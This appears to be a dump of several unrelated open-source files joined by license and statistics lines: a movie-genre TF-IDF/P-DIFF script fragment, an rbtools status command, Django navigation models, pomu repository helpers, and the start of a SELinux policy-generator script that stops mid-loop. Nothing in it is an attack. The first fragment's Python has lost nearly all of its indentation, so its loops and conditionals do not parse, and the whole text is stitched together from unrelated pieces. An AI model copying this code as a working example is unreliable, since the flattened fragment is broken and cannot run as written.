#IDF here will be considered as the number of movie-genre that belong to a certain tag. So the idf calculation will be
# Total movie-genres / sum of weight of movie-genre with a particular tag
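    # Concretely: idf(tag) = ln(total_movie_count / weighted_genre_movie_count[tag]);
    # the code below approximates the natural log with log(x, 2.71828).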
#Calculate the total weighted count for movie-genre count for each tag.
    #weighted count for an occurrence of a tag = tag_newness
weighted_genre_movie_count={}
cur2.execute("SELECT movieid FROM `mlmovies_clean` where genres=%s || genres=%s",[args.GENRE1,args.GENRE2])
result1 = cur2.fetchall()
for data1 in result1:
#print data1
genre_movie_id = data1[0]
genre_tag_id=""
        #Select distinct tagIDs for the movieID
cur2.execute("SELECT tagid,newness_wt_norm_nolog FROM mltags WHERE movieid = %s",[genre_movie_id])
result2 = cur2.fetchall()
for data2 in result2:
genre_tag_id = data2[0]
genre_tag_newness = data2[1]
#Get the tag_name for the tagID. For each tag weight, add the rank_weight as well.
cur2.execute("SELECT tag FROM `genome-tags` WHERE tagID = %s", [genre_tag_id])
result2_sub = cur2.fetchone()
tagName = result2_sub[0]
tagWeight = round((float(genre_tag_newness)),10)
if tagName in weighted_genre_movie_count:
weighted_genre_movie_count[tagName] = round((weighted_genre_movie_count[tagName] + tagWeight), 10)
else:
weighted_genre_movie_count[tagName] = tagWeight
# ===============================================================================
#Subtask-2: Get the TF , IDF and TF-IDF for the genres
#===============================================================================
data_dictionary_tf_genre1 = {}
data_dictionary_tf_idf_genre1 = {}
total_tag_newness_weight = 0
#Get all movies of genre 1.
cur2.execute("SELECT movieid FROM `mlmovies_clean` where genres = %s",[args.GENRE1])
result1 = cur2.fetchall()
for data1 in result1:
genre_movie_id = data1[0]
        #Select distinct tagIDs for the movieID
cur2.execute("SELECT tagid,newness_wt_norm_nolog FROM mltags WHERE movieid = %s",[genre_movie_id])
result2 = cur2.fetchall()
for data2 in result2:
genre_tag_id = data2[0]
genre_tag_newness = data2[1]
#Get the tag_name for the tagID.
cur2.execute("SELECT tag FROM `genome-tags` WHERE tagID = %s", [genre_tag_id])
result2_sub = cur2.fetchone()
tagName = result2_sub[0]
tagWeight = round(float(genre_tag_newness),10)
total_tag_newness_weight = total_tag_newness_weight + tagWeight
#For TF
if tagName in data_dictionary_tf_genre1:
data_dictionary_tf_genre1[tagName] = round((data_dictionary_tf_genre1[tagName] + tagWeight),10)
else:
data_dictionary_tf_genre1[tagName] = tagWeight
# Make weight of other tags to zero. Calculate the tf, idf and tf-idf values for the tags that exist.
cur2.execute("SELECT tag FROM `genome-tags`")
tagName = cur2.fetchall()
for keyVal in tagName:
key = keyVal[0]
if key in data_dictionary_tf_genre1:
data_dictionary_tf_genre1[key] = round((float(data_dictionary_tf_genre1[key]) / float(total_tag_newness_weight)),10)
data_dictionary_tf_idf_genre1[key] = round((float(log((total_movie_count/weighted_genre_movie_count[key]),2.71828))), 10)
data_dictionary_tf_idf_genre1[key] = round((data_dictionary_tf_genre1[key] * data_dictionary_tf_idf_genre1[key]), 10)
else:
data_dictionary_tf_genre1[key] = 0.0
#genre_model_value_tf_genre1 = sorted(data_dictionary_tf_genre1.items(), key=operator.itemgetter(1), reverse=True)
#genre_model_value_tfidf_genre1 = sorted(data_dictionary_tf_genre1.items(), key=operator.itemgetter(1), reverse=True)
#Get all movies of a specific genre 2.
#--------------------------------------
data_dictionary_tf_genre2 = {}
data_dictionary_tf_idf_genre2 = {}
total_tag_newness_weight = 0
cur2.execute("SELECT movieid FROM `mlmovies_clean` where genres = %s",[args.GENRE2])
result1 = cur2.fetchall()
for data1 in result1:
genre_movie_id = data1[0]
        #Select distinct tagIDs for the movieID
cur2.execute("SELECT tagid,newness_wt_norm_nolog FROM mltags WHERE movieid = %s",[genre_movie_id])
result2 = cur2.fetchall()
for data2 in result2:
genre_tag_id = data2[0]
genre_tag_newness = data2[1]
#Get the tag_name for the tagID.
cur2.execute("SELECT tag FROM `genome-tags` WHERE tagID = %s", [genre_tag_id])
result2_sub = cur2.fetchone()
tagName = result2_sub[0]
tagWeight = round(float(genre_tag_newness),10)
total_tag_newness_weight = total_tag_newness_weight + tagWeight
#For TF
if tagName in data_dictionary_tf_genre2:
data_dictionary_tf_genre2[tagName] = round((data_dictionary_tf_genre2[tagName] + tagWeight),10)
else:
data_dictionary_tf_genre2[tagName] = tagWeight
# Make weight of other tags to zero.
cur2.execute("SELECT tag FROM `genome-tags`")
tagName = cur2.fetchall()
for keyVal in tagName:
key=keyVal[0]
if key in data_dictionary_tf_genre2:
data_dictionary_tf_genre2[key] = round((float(data_dictionary_tf_genre2[key]) / float(total_tag_newness_weight)),10)
data_dictionary_tf_idf_genre2[key] = round((float(log((total_movie_count/weighted_genre_movie_count[key]),2.71828))), 10)
data_dictionary_tf_idf_genre2[key] = round((data_dictionary_tf_genre2[key] * data_dictionary_tf_idf_genre2[key]), 10)
else:
data_dictionary_tf_genre2[key] = 0.0
#genre_model_value_tf_genre1 = sorted(data_dictionary_tf_genre1.items(), key=operator.itemgetter(1), reverse=True)
#genre_model_value_tfidf_genre2 = sorted(data_dictionary_tf_genre2.items(), key=operator.itemgetter(1), reverse=True)
#--------------------------------------------------------------------------------------------------------------
#Subtask-3 : Calculate the DIFF vector
#Manhattan distance is used since for high dimensions it works better. compared to higher order minkowski distance
diff_vector={}
#Makes more sense to have +ve 0, and -ve as it clearly states the difference, between genre1
#and genre2.
for key in data_dictionary_tf_idf_genre1:
if key in data_dictionary_tf_idf_genre2:
diff_vector[key] = data_dictionary_tf_idf_genre1[key] - data_dictionary_tf_idf_genre2[key]
else:
diff_vector[key] = data_dictionary_tf_idf_genre1[key]
for key in data_dictionary_tf_idf_genre2:
if key in diff_vector:
continue
else:
diff_vector[key] = 0 - data_dictionary_tf_idf_genre2[key]
cur2.execute("SELECT tag FROM `genome-tags`")
tagName = cur2.fetchall()
for keyVal in tagName:
key = keyVal[0]
if key in diff_vector:
continue;
else:
diff_vector[key] = 0.0
genre_diff = sorted(diff_vector.items(), key=operator.itemgetter(1), reverse=True)
#pprint.pprint(genre_model_value_tfidf_genre1)
#pprint.pprint(genre_model_value_tfidf_genre2)
pprint.pprint(genre_diff)
elif args.MODEL == "P-DIFF1" :
###############################
#MODEL = P-DIFF-1
###############################
# ===============================================================================
#Subtask-1: Calculate the number of movies for a given tag for genre1 and genre2
#and total movies in genre1
#================================================================================
dd_r1_genre1 = {}
dd_m1_genre2 = {}
M = total_movie_count #Movies in genre1 U genre2
cur2.execute("SELECT count(movieid) FROM `mlmovies_clean` where genres = %s",[args.GENRE1])
result1 = cur2.fetchone()
R = float(result1[0]) #Movies in genre1
#Calculation for genre1. r = movies in genre1 with tag t
cur2.execute("SELECT movieid FROM `mlmovies_clean` where genres = %s",[args.GENRE1])
result1 = cur2.fetchall()
for data1 in result1:
genre_movie_id = data1[0]
        #Select distinct tagIDs for the movieID
cur2.execute("SELECT tagid FROM mltags WHERE movieid = %s",[genre_movie_id])
result2 = cur2.fetchall()
for data2 in result2:
genre_tag_id = data2[0]
#Get the tag_name for the tagID.
cur2.execute("SELECT tag FROM `genome-tags` WHERE tagID = %s", [genre_tag_id])
result2_sub = cur2.fetchone()
tagName = result2_sub[0]
#For TF
if tagName in dd_r1_genre1:
dd_r1_genre1[tagName] = (dd_r1_genre1[tagName] + 1)
else:
dd_r1_genre1[tagName] = 1
#Calculation for m=movies in genre1 U genre 2 with tag t
cur2.execute("SELECT distinct(movieid) FROM `mlmovies_clean` where genres=%s || genres=%s",[args.GENRE1,args.GENRE2])
result1 = cur2.fetchall()
for data1 in result1:
genre_movie_id = data1[0]
        #Select distinct tagIDs for the movieID
cur2.execute("SELECT tagid FROM mltags WHERE movieid = %s",[genre_movie_id])
result2 = cur2.fetchall()
for data2 in result2:
genre_tag_id = data2[0]
#Get the tag_name for the tagID.
cur2.execute("SELECT tag FROM `genome-tags` WHERE tagID = %s", [genre_tag_id])
result2_sub = cur2.fetchone()
tagName = result2_sub[0]
#For TF
if tagName in dd_m1_genre2:
dd_m1_genre2[tagName] = (dd_m1_genre2[tagName] + 1)
else:
dd_m1_genre2[tagName] = 1
#print dd_r1_genre1
#print dd_m1_genre2
#Subtask:2 - Calculate the pdiff1 using the given formula
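    # For each tag, with r = movies in genre1 tagged t, m = movies in genre1 U genre2 tagged t,
    # R = |genre1|, M = |genre1 U genre2| and p = m/M as a smoothing term (ref: Salton & Buckley),
    # the weight computed below is:
    #   log2( ((r+p)/(R-r+1)) / ((m-r+p)/(M-m-R+r+1)) ) * ( (r+p)/(R+1) - (m-r+p)/(M-R+1) )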
pdiff_wt_genre1={}
for tag in dd_m1_genre2:
r=0
if tag in dd_r1_genre1:
r = float(dd_r1_genre1[tag])
m = float(dd_m1_genre2[tag])
val1=0
val2=0
val3=0
val4=0
#r = 0 means that the tag never occurs for a genre.
#R=r means that the tag occurs for every movie of the genre, so its frequency is 1 and
        #discriminating power is 0. In both scenarios, we ignore such a tag.
        #m >= r always since it's a union.
# Get the probability of the tag in M and add it to avoid edge cases- ref:Salton & buckley
p_tag = float(m / M)
        #The added probability term keeps the numerators non-zero in the edge cases; since the
        #maximum probability is 1, it makes little difference for the remaining values.
val1 = float(float(r + p_tag)/(R-r+1))
val3 = float(float(r + p_tag)/(R + 1))
val2 = float((m-r+p_tag)/(M-m-R+r+1))
val4 = float((m-r+p_tag)/(M-R+1))
pdiff_wt_genre1[tag] = float(log(float(val1/val2),2)) * float(val3 - val4)
#Make weight of other tags to zero
cur2.execute("SELECT tag FROM `genome-tags`")
tagName = cur2.fetchall()
for keyval in tagName:
key = keyval[0]
if key in pdiff_wt_genre1:
continue
else:
pdiff_wt_genre1[key] = 0
pprint.pprint(sorted(pdiff_wt_genre1.items(), key=operator.itemgetter(1), reverse=True))
elif args.MODEL == "P-DIFF2":
###############################
#MODEL = P-DIFF-2
###############################
# ===============================================================================
#Subtask-1: Calculate the number of movies for a given tag for genre1 and genre2
#and total movies in genre2
#================================================================================
dd_r1_genre1 = {}
dd_m1_genre2 = {}
M = total_movie_count #Movies in genre1 U genre2
cur2.execute("SELECT count(movieid) FROM `mlmovies_clean` where genres = %s",[args.GENRE2])
result1 = cur2.fetchone()
R = float(result1[0]) #Movies in genre1
#Calculation for genre2. r = movies in genre2 without tag t. We first get the value of movies in genre2 with tag t then
    #subtract that value from the total number of movies in genre2, for each tag
cur2.execute("SELECT movieid FROM `mlmovies_clean` where genres = %s",[args.GENRE2])
result1 = cur2.fetchall()
for data1 in result1:
genre_movie_id = data1[0]
        #Select distinct tagIDs for the movieID
cur2.execute("SELECT tagid FROM mltags WHERE movieid = %s",[genre_movie_id])
result2 = cur2.fetchall()
for data2 in result2:
genre_tag_id = data2[0]
#Get the tag_name for the tagID.
cur2.execute("SELECT tag FROM `genome-tags` WHERE tagID = %s", [genre_tag_id])
result2_sub = cur2.fetchone()
tagName = result2_sub[0]
#For TF
if tagName in dd_r1_genre1:
dd_r1_genre1[tagName] = (dd_r1_genre1[tagName] + 1)
else:
dd_r1_genre1[tagName] = 1
#Calculation for genre2. m=movies in genre1 U genre 2 without tag t. Subtract later from M to get movies in genre1 or genre2
#without a tag
cur2.execute("SELECT distinct(movieid) FROM `mlmovies_clean` where genres=%s || genres=%s",[args.GENRE1,args.GENRE2])
result1 = cur2.fetchall()
for data1 in result1:
genre_movie_id = data1[0]
			#Select distinct tagIDs for the movieID
cur2.execute("SELECT tagid FROM mltags WHERE movieid = %s",[genre_movie_id])
result2 = cur2.fetchall()
for data2 in result2:
genre_tag_id = data2[0]
#Get the tag_name for the tagID.
cur2.execute("SELECT tag FROM `genome-tags` WHERE tagID = %s", [genre_tag_id])
result2_sub = cur2.fetchone()
tagName = result2_sub[0]
#For TF
if tagName in dd_m1_genre2:
dd_m1_genre2[tagName] = (dd_m1_genre2[tagName] + 1)
else:
dd_m1_genre2[tagName] = 1
#Subtask:2 - Calculate the pdiff1 using the given formula
pdiff_wt_genre1={}
for tag in dd_m1_genre2:
r = R
if tag in dd_r1_genre1:
r = R - float(dd_r1_genre1[tag])
m = M - float(dd_m1_genre2[tag])
val1=0
val2=0
val3=0
val4=0
#r = 0 means that the tag never occurs for a genre.
#R=r means that the tag occurs for every movie of the genre, so its frequency is 1 and
#discriminating power is 0 . In both the scenarios, we ignore such a tag.
#m>= r always since its a union.
# Get the probability of the tag not in M and add it to avoid edge cases- ref:Salton & buckley
p_tag = float(m / M)
			#Because the maximum value of this probability is 1, the smoothing term makes
			#little difference to the weights for values less than 1.
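			# Note (a reading of the code above, not from a spec): unlike the P-DIFF1
			# branch, r and m here were computed as complements (movies WITHOUT tag t),
			# so the same smoothed log-ratio below weights tags by their absence.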
val1 = float(float(r + p_tag)/(R-r+1))
val3 = float(float(r + p_tag)/(R + 1))
val2 = float((m-r+p_tag)/(M-m-R+r+1))
val4 = float((m-r+p_tag)/(M-R+1))
pdiff_wt_genre1[tag] = float(log(float(val1/val2),2)) * (float(val3 - val4))
#Make weight of other tags to zero
cur2.execute("SELECT tag FROM `genome-tags`")
tagName = cur2.fetchall()
for keyval in tagName:
key = keyval[0]
if key in pdiff_wt_genre1:
continue
else:
pdiff_wt_genre1[key] = 0
pprint.pprint(sorted(pdiff_wt_genre1.items(), key=operator.itemgetter(1), reverse=True))
| gpl-3.0 | 3,274,444,029,248,706,600 | 33.875 | 133 | 0.578737 | false | 3.541044 | false | false | false |
brettdh/rbtools | rbtools/commands/status.py | 1 | 2506 | import logging
from rbtools.commands import Command, Option
from rbtools.utils.repository import get_repository_id
from rbtools.utils.users import get_username
class Status(Command):
"""Display review requests for the current repository."""
name = "status"
author = "The Review Board Project"
description = "Output a list of your pending review requests."
args = ""
option_list = [
Option("--all",
dest="all_repositories",
action="store_true",
default=False,
help="Show review requests for all repositories instead "
"of the detected repository."),
Command.server_options,
Command.repository_options,
Command.perforce_options,
]
def output_request(self, request):
print " r/%s - %s" % (request.id, request.summary)
def output_draft(self, request, draft):
print " * r/%s - %s" % (request.id, draft.summary)
def main(self):
repository_info, tool = self.initialize_scm_tool(
client_name=self.options.repository_type)
server_url = self.get_server_url(repository_info, tool)
api_client, api_root = self.get_api(server_url)
self.setup_tool(tool, api_root=api_root)
username = get_username(api_client, api_root, auth_required=True)
query_args = {
'from_user': username,
'status': 'pending',
'expand': 'draft',
}
if not self.options.all_repositories:
repo_id = get_repository_id(
repository_info,
api_root,
repository_name=self.options.repository_name)
if repo_id:
query_args['repository'] = repo_id
else:
logging.warning('The repository detected in the current '
'directory was not found on\n'
'the Review Board server. Displaying review '
'requests from all repositories.')
requests = api_root.get_review_requests(**query_args)
try:
while True:
for request in requests:
if request.draft:
self.output_draft(request, request.draft[0])
else:
self.output_request(request)
requests = requests.get_next(**query_args)
except StopIteration:
pass
| mit | 7,896,034,050,389,022,000 | 33.805556 | 77 | 0.553472 | false | 4.523466 | false | false | false |
mennanov/django-blueprint | project_name/apps/navigation/models.py | 1 | 1661 | # -*- coding: utf-8 -*-
from django.db import models
from django.utils.translation import ugettext_lazy as _
from mptt.models import TreeForeignKey, TreeManyToManyField, MPTTModel
class Navigation(models.Model):
"""
Navigation menu
"""
key = models.CharField(_(u'key'), max_length=32, help_text=_(u'This value is used in the code, do not touch it!'))
name = models.CharField(_(u'name'), max_length=70)
links = TreeManyToManyField('Link', verbose_name=_(u'links'), through='LinkMembership')
def __unicode__(self):
return self.name
class Meta:
verbose_name = _(u'navigation menu')
verbose_name_plural = _(u'navigation menus')
class Link(MPTTModel):
"""
Navigation link
"""
parent = TreeForeignKey('self', verbose_name=_(u'parent link'), null=True, blank=True)
name = models.CharField(_(u'name'), max_length=70, help_text=_(u'Name of the link in the menu'))
url = models.CharField(_(u'url'), max_length=255, help_text=_(u'Example: "/about/" or "/"'))
def __unicode__(self):
return self.name
def get_absolute_url(self):
return self.url
class Meta:
verbose_name = _(u'navigation link')
verbose_name_plural = _(u'navigation links')
class LinkMembership(models.Model):
"""
Link in navigation membership
"""
navigation = models.ForeignKey('Navigation')
link = TreeForeignKey('Link')
position = models.PositiveIntegerField(_(u'position'), default=0, db_index=True)
class Meta:
ordering = ['position']
verbose_name = _(u'link membership')
verbose_name_plural = _(u'link memberships') | gpl-2.0 | -8,933,735,953,260,462,000 | 30.358491 | 118 | 0.64118 | false | 3.862791 | false | false | false |
Hummer12007/pomu | pomu/repo/repo.py | 1 | 9456 | """Subroutines with repositories"""
from os import path, rmdir, makedirs
from shutil import copy2
from git import Repo
from patch import PatchSet
import portage
from pomu.package import Package, PatchList
from pomu.util.cache import cached
from pomu.util.fs import remove_file, strip_prefix
from pomu.util.result import Result
class Repository():
def __init__(self, root, name=None):
"""
Parameters:
root - root of the repository
name - name of the repository
"""
if not pomu_status(root):
raise ValueError('This path is not a valid pomu repository')
self.root = root
self.name = name
@property
def repo(self):
return Repo(self.root)
@property
def pomu_dir(self):
return path.join(self.root, 'metadata/pomu')
def merge(self, mergeable):
"""Merges a package or a patchset into the repository"""
if isinstance(mergeable, Package):
return self.merge_pkg(mergeable)
elif isinstance(mergeable, PatchList):
pkg = self.get_package(mergeable.name, mergeable.category,
mergeable.slot).unwrap()
return pkg.patch(mergeable.patches)
return Result.Err() #unreachable yet
def merge_pkg(self, package):
"""Merge a package (a pomu.package.Package package) into the repository"""
r = self.repo
pkgdir = path.join(self.pomu_dir, package.category, package.name)
if package.slot != '0':
pkgdir = path.join(pkgdir, package.slot)
package.merge_into(self.root).expect('Failed to merge package')
for wd, f in package.files:
r.index.add([path.join(wd, f)])
manifests = package.gen_manifests(self.root).expect()
for m in manifests:
r.index.add([m])
self.write_meta(pkgdir, package, manifests)
with open(path.join(self.pomu_dir, 'world'), 'a+') as f:
f.write('{}/{}'.format(package.category, package.name))
f.write('\n' if package.slot == '0' else ':{}\n'.format(package.slot))
r.index.add([path.join(self.pomu_dir, package.category, package.name)])
r.index.add([path.join(self.pomu_dir, 'world')])
r.index.commit('Merged package ' + package.name)
return Result.Ok('Merged package ' + package.name + ' successfully')
def write_meta(self, pkgdir, package, manifests):
"""
Write metadata for a Package object
Parameters:
pkgdir - destination directory
package - the package object
manifests - list of generated manifest files
"""
makedirs(pkgdir, exist_ok=True)
with open(path.join(pkgdir, 'FILES'), 'w+') as f:
for wd, fil in package.files:
f.write('{}/{}\n'.format(wd, fil))
for m in manifests:
f.write('{}\n'.format(strip_prefix(m, self.root)))
if package.patches:
patch_dir = path.join(pkgdir, 'patches')
makedirs(patch_dir, exist_ok=True)
with open(path.join(pkgdir, 'PATCH_ORDER'), 'w') as f:
for patch in package.patches:
copy2(patch, patch_dir)
f.write(path.basename(patch) + '\n')
if package.backend:
with open(path.join(pkgdir, 'BACKEND'), 'w+') as f:
f.write('{}\n'.format(package.backend.__cname__))
package.backend.write_meta(pkgdir)
with open(path.join(pkgdir, 'VERSION'), 'w+') as f:
f.write(package.version)
def unmerge(self, package):
"""Remove a package (by contents) from the repository"""
r = self.repo
for wd, f in package.files:
dst = path.join(self.root, wd)
remove_file(r, path.join(dst, f))
try:
rmdir(dst)
except OSError: pass
pf = path.join(self.pomu_dir, package.name)
if path.isfile(pf):
remove_file(r, pf)
r.commit('Removed package ' + package.name + ' successfully')
return Result.Ok('Removed package ' + package.name + ' successfully')
def remove_package(self, name):
"""Remove a package (by name) from the repository"""
pkg = self.get_package(name).expect()
return self.unmerge(pkg)
def update_package(self, category, name, new):
"""Updates a package, replacing it by a newer version"""
        pkg = self.get_package(name, category).expect()
self.unmerge(pkg).expect()
self.merge(new)
def _get_package(self, category, name, slot='0'):
"""Get an existing package (by category, name and slot), reading the manifest"""
from pomu.source import dispatcher
if slot == '0':
pkgdir = path.join(self.pomu_dir, category, name)
else:
pkgdir = path.join(self.pomu_dir, category, name, slot)
backend = None
if path.exists(path.join(pkgdir, 'BACKEND')):
with open(path.join(pkgdir, 'BACKEND'), 'r') as f:
bname = f.readline().strip()
backend = dispatcher.backends[bname].from_meta_dir(pkgdir)
if backend.is_err():
return backend
backend = backend.ok()
with open(path.join(pkgdir, 'VERSION'), 'r') as f:
version = f.readline().strip()
with open(path.join(pkgdir, 'FILES'), 'r') as f:
files = [x.strip() for x in f]
patches=[]
if path.isfile(path.join(pkgdir, 'PATCH_ORDER')):
with open(path.join(pkgdir, 'PATCH_ORDER'), 'r') as f:
patches = [x.strip() for x in f]
pkg = Package(name, self.root, backend, category=category, version=version, slot=slot, files=files, patches=[path.join(pkgdir, 'patches', x) for x in patches])
pkg.__class__ = MergedPackage
return Result.Ok(pkg)
def get_package(self, name, category=None, slot=None):
"""Get a package by name, category and slot"""
with open(path.join(self.pomu_dir, 'world'), 'r') as f:
for spec in f:
spec = spec.strip()
cat, _, nam = spec.partition('/')
nam, _, slo = nam.partition(':')
if (not category or category == cat) and nam == name:
if not slot or (slot == '0' and not slo) or slot == slo:
                        return self._get_package(cat, name, slo or '0')
return Result.Err('Package not found')
def get_packages(self):
with open(path.join(self.pomu_dir, 'world'), 'r') as f:
lines = [x.strip() for x in f.readlines() if x.strip() != '']
return lines
def portage_repos():
"""Yield the repositories configured for portage"""
rsets = portage.db[portage.root]['vartree'].settings.repositories
for repo in rsets.prepos_order:
yield repo
def portage_repo_path(repo):
"""Get the path of a given portage repository (repo)"""
rsets = portage.db[portage.root]['vartree'].settings.repositories
if repo in rsets.prepos:
return rsets.prepos[repo].location
return None
def pomu_status(repo_path):
"""Check if pomu is enabled for a repository at a given path (repo_path)"""
return path.isdir(path.join(repo_path, 'metadata', 'pomu'))
def pomu_active_portage_repo():
"""Returns a portage repo, for which pomu is enabled"""
for repo in portage_repos():
if pomu_status(portage_repo_path(repo)):
return repo
return None
@cached
def pomu_active_repo(no_portage=None, repo_path=None):
"""Returns a repo for which pomu is enabled"""
if no_portage:
if not repo_path:
return Result.Err('repo-path required')
if pomu_status(repo_path):
return Result.Ok(Repository(repo_path))
return Result.Err('pomu is not initialized')
else:
repo = pomu_active_portage_repo()
if repo:
return Result.Ok(Repository(portage_repo_path(repo), repo))
return Result.Err('pomu is not initialized')
class MergedPackage(Package):
@property
def pkgdir(self):
ret = path.join(self.root, 'metadata', 'pomu', self.category, self.name)
if self.slot != '0':
ret = path.join(ret, self.slot)
return ret
def patch(self, patch):
if isinstance(patch, list):
for x in patch:
self.patch(x)
return Result.Ok()
ps = PatchSet()
ps.parse(open(patch, 'r'))
ps.apply(root=self.root)
self.add_patch(patch)
return Result.Ok()
@property
def patch_list(self):
with open(path.join(self.pkgdir, 'PATCH_ORDER'), 'r') as f:
lines = [x.strip() for x in f.readlines() if x.strip() != '']
return lines
def add_patch(self, patch, name=None): # patch is a path, unless name is passed
patch_dir = path.join(self.pkgdir, 'patches')
makedirs(patch_dir, exist_ok=True)
if name is None:
copy2(patch, patch_dir)
with open(path.join(self.pkgdir, 'PATCH_ORDER'), 'w+') as f:
f.write(path.basename(patch) + '\n')
else:
with open(path.join(patch_dir, name), 'w') as f:
f.write(patch)
with open(path.join(self.pkgdir, 'PATCH_ORDER'), 'w+') as f:
f.write(name + '\n')
| gpl-2.0 | 5,766,960,781,250,393,000 | 38.07438 | 167 | 0.579315 | false | 3.702428 | false | false | false |
Siosm/contextd-capture | piga-systrans/selaudit/selaudit.py | 2 | 25513 | #!/usr/bin/python3
# -*- coding: utf-8 -*-
# Configuration
# Templates
basepolname = 'template/module'
base_transpol_name = 'template/temp_transition'
makefile_path = 'template/Makefile'
# Default value for the template variables
user_u_default = 'user_u'
user_r_default = 'user_r'
user_t_default = 'user_t'
module_domain_t_default_pattern = 'user_%modulename%_t'
module_exec_t_default_pattern = '%modulename%_exec_t'
module_tmp_domain_t_default_pattern = '%modulename%_tmp_t'
module_log_domain_t_default_pattern = '%modulename%_log_t'
# Selpolgen user
selpolgen_u_default = 'root'
selpolgen_r_default = 'sysadm_r'
selpolgen_t_default = 'sysadm_t'
# Programs fullpath
semodule_path = '/usr/sbin/semodule'
make_path = '/usr/bin/make'
setfilecon_path = '/usr/sbin/setfilecon'
runcon_path = '/usr/bin/runcon'
audit2allow_path = '/usr/bin/audit2allow'
dmesg_path = '/bin/dmesg'
strace_path = '/usr/bin/strace'
ls_path = '/bin/ls'
setfiles_path = '/sbin/setfiles'
# /Configuration
# Import
import getopt
import re, string, sys
import os, signal
import glob
import subprocess
import shutil
import time
from pigi import *
# Global variables
verbosity = 0
wantToAbort = False
# functions
def log(priority, msg):
if priority <= verbosity:
print(msg)
def handler(signum, frame):
global wantToAbort
wantToAbort = True
def mkdir_p(path):
if not os.path.exists (path):
os.makedirs (path)
def getPolicyPath(module_name, extension=''):
if len(extension) > 0:
return "policies/%s/%s.%s" % (module_name, module_name, extension)
else:
return "policies/%s/" % module_name
def getTempModuleTransitionPath(module_name, extension=''):
if len(extension) > 0:
return "temp/%s/%s.%s" % (module_name, module_name, extension)
else:
return "temp/%s/" % module_name
def loadSELinuxModule(module_path_pp):
proc = subprocess.Popen([semodule_path, '-i', module_path_pp], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout,stderr = proc.communicate()
if proc.returncode != 0:
print("----\nError while loading the SELinux module '%s':\n<stdout>%s</stdout>\n<stderr>%s</stderr>\n----" % (module_path_pp, stdout, stderr), file=sys.stderr)
return False
else:
return True
def unloadSELinuxModule(module_name):
proc = subprocess.Popen([semodule_path, '-r', module_name], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout,stderr = proc.communicate()
if proc.returncode != 0:
print("----\nError while unloading the SELinux module '%s':\n<stdout>%s</stdout>\n<stderr>%s</stderr>\n----" % (module_name, stdout, stderr), file=sys.stderr)
return False
else:
return True
def reloadSELinuxModule(module_name):
if unloadSELinuxModule(module_name):
if loadSELinuxModule(getPolicyPath(module_name, "pp")):
return True
else:
return False
else:
return False
def compileAndLoadSELinuxModule(module_dir):
proc = subprocess.Popen([make_path, 'load'], cwd=module_dir, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout,stderr = proc.communicate()
if proc.returncode != 0:
print("----\nError while compiling and loading the module at '%s':\n<stdout>%s</stdout>\n<stderr>%s</stderr>\n----" % (module_dir, stdout, stderr), file=sys.stderr)
return False
else:
return True
def generateBasePolicy(module_name, app_path, module_domain_t, module_tmp_domain_t, module_log_domain_t, module_exec_t, user_u, user_r, user_t, permissive_mode=False):
#TODO add exceptions handling. It's fine for the moment as these exceptions are fatal for the program
# Get the template
template_te = open("%s.te" % basepolname, "r").read()
template_if = open("%s.if" % basepolname, "r").read()
template_fc = open("%s.fc" % basepolname, "r").read()
if len(template_te) == 0:
return ''
if permissive_mode:
template_te += "permissive ${module_domain_t};"
# Replace the template variables by our values
dico=dict({"module": module_name, "app_path": app_path, "module_domain_t": module_domain_t, "module_tmp_domain_t": module_tmp_domain_t, "module_log_domain_t": module_log_domain_t, "module_exec_t": module_exec_t, "user_u": user_u, "user_r": user_r, "user_t": user_t})
for key in dico.keys():
template_te=template_te.replace("${%s}" % key, dico[key])
template_if=template_if.replace("${%s}" % key, dico[key])
template_fc=template_fc.replace("${%s}" % key, dico[key])
# Create a directory for the output module
mkdir_p(getPolicyPath(module_name, ""))
# write the output module there
file_te = open(getPolicyPath(module_name, "te"), "w").write(template_te)
file_if = open(getPolicyPath(module_name, "if"), "w").write(template_if)
file_fc = open(getPolicyPath(module_name, "fc"), "w").write(template_fc)
# Copy the Makefile
shutil.copyfile(makefile_path, "%sMakefile" % getPolicyPath(module_name, ""))
return getPolicyPath(module_name)
def generateAuditPolicy(module_name, app_path, module_domain_t, module_exec_t, user_u, user_r, user_t):
#TODO add exceptions handling. It's fine for the moment as these exceptions are fatal for the program
module_name = "selpolgen-%s" % module_name
# Get the template
template_te = open("%s.te" % base_transpol_name, "r").read()
template_if = open("%s.if" % base_transpol_name, "r").read()
template_fc = open("%s.fc" % base_transpol_name, "r").read()
if len(template_te) == 0:
return ''
# Replace the template variables by our values
dico=dict({"module": module_name, "app_path": app_path, "module_domain_t": module_domain_t, "module_exec_t": module_exec_t, "user_u": user_u, "user_r": user_r, "user_t": user_t})
for key in dico.keys():
template_te=template_te.replace("${%s}" % key, dico[key])
template_if=template_if.replace("${%s}" % key, dico[key])
template_fc=template_fc.replace("${%s}" % key, dico[key])
# Remove the directory for the output module
try:
shutil.rmtree(getTempModuleTransitionPath(module_name, ""))
except:
pass
# Create a directory for the output module
mkdir_p(getTempModuleTransitionPath(module_name, ""))
# write the output module there
file_te = open(getTempModuleTransitionPath(module_name, "te"), "w").write(template_te)
file_if = open(getTempModuleTransitionPath(module_name, "if"), "w").write(template_if)
file_fc = open(getTempModuleTransitionPath(module_name, "fc"), "w").write(template_fc)
# Copy the Makefile
shutil.copyfile(makefile_path, "%sMakefile" % getTempModuleTransitionPath(module_name, ""))
return getTempModuleTransitionPath(module_name)
def setFileSELinuxContext(user_u, role_r, type_t, filepath):
context = '%s:%s:%s' % (user_u, role_r, type_t)
proc = subprocess.Popen([setfilecon_path, context, filepath], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout,stderr = proc.communicate()
if proc.returncode != 0:
print("Error while setting the context %s to the file '%s':\n<stdout>%s</stdout>\n<stderr>%s</stderr>" % (context, filepath, stdout, stderr), file=sys.stderr)
return False
else:
return True
def getAudit2AllowRules(domain_t):
rules = []
proc = subprocess.Popen([audit2allow_path, "-d"], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout,stderr = proc.communicate()
if proc.returncode != 0:
print("Error while auditing:\n<stdout>%s</stdout>\n<stderr>%s</stderr>" % (stdout, stderr), file=sys.stderr)
return rules
lines=stdout.splitlines()
log(2, "audit2allow output (%i lines) is: '%s'" % (len(lines), stdout))
store=False
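	# audit2allow -d groups rules per source domain under separator lines; an
	# illustrative (made-up) block looks like:
	#   #============= user_foo_t ==============
	#   allow user_foo_t some_type_t:file read;
	# Only rules from the block whose domain equals domain_t are collected below.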
for line in lines:
